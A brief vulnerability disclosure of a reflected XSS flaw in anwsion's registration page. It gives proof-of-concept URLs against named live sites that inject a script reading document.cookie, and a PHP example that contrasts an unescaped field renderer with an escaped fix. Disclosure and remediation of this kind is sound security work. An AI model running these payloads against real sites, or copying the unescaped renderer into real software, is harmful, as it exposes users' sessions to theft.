A universal reflected XSS flaw in anwsion
http://www.3hack.com/?/account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C
http://wenda.anwsion.com/account/register/email-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg
This is not the only affected parameter, for example:
http://wenda.anwsion.com/account/register/user_name-435420828%40qq.com%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%22%3C#.jpg
Every parameter on the registration page is affected:
name-{XSS code}
Remediation: escape the parameter values.
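What that escaping looks like for a value reflected into a form field, as an added example that is not anwsion's own code. It assumes the register route takes one `name-value` pair from the URL path and writes the decoded value into an input's `value` attribute; the function names and the route constant are hypothetical.

```php
<?php
// Added example, not anwsion source code.
// Assumption: the register route reads one "name-value" pair from the URL path
// and writes the decoded value back into the form field of that name.

const REGISTER_PREFIX = '/account/register/';

// Hypothetical helper: "/account/register/email-foo" => ['email', 'foo'].
function parse_register_param(string $path): ?array
{
    if (strncmp($path, REGISTER_PREFIX, strlen(REGISTER_PREFIX)) !== 0) {
        return null;
    }
    // Split on the first "-" only, so the value may itself contain "-" or "/".
    $parts = explode('-', substr($path, strlen(REGISTER_PREFIX)), 2);
    if (count($parts) !== 2 || $parts[0] === '') {
        return null;
    }
    return [$parts[0], rawurldecode($parts[1])];
}

// Before: the decoded value is concatenated into the attribute unescaped,
// so a '">' in the value closes the attribute and the tag.
function render_field_unescaped(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// After: name and value are HTML-escaped, including both quote characters.
function render_field_escaped(string $name, string $value): string
{
    $esc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $esc($name) . '" value="' . $esc($value) . '">';
}

// Sample input: the path of the first URL in the report.
$path = '/account/register/email-435420828%40qq.com%22%3E%3Cscript%3E'
      . 'alert%28document.cookie%29%3C/script%3E%22%3C';

$param = parse_register_param($path);
if ($param !== null) {
    [$name, $value] = $param;
    echo 'unescaped: ', render_field_unescaped($name, $value), PHP_EOL;
    echo 'escaped:   ', render_field_escaped($name, $value), PHP_EOL;
}
```

`htmlspecialchars` with `ENT_QUOTES` covers HTML text and quoted attribute values only; a value written into a script block or a URL needs the encoding for that context instead.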